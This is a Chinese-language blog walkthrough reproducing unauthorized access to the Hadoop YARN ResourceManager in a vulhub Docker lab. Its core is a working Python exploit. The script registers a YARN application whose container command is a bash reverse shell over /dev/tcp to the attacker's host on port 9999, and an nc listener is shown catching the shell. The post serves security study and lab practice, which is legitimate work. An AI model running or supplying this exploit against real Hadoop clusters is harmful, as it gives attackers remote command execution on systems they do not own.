hadoop未授权访问


漏洞概述

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作。

环境搭建

1.搭建vulhub
2.启动环境

cd /vulhub/hadoop/unauthorized-yarn
docker-compose up -d
docker-compose ps  

image-20210606135859065

漏洞复现

浏览器访问靶机ip地址加上端口,http://192.168.182.129:8088/

image-20210606135949979

exp

import requests

target = 'http://192.168.49.129:8088/' #靶机地址
lhost = '172.31.14.211' #把你的本地主机ip放在这里,在9999端口监听

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

nc监听9999端口,执行脚本

nc -lvvp 9999

image-20210606140046926

成功反弹shell

image-20210606140113860

关闭测试环境

docker-compose down

文章作者: Kz_404
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Kz_404 !
评论
  目录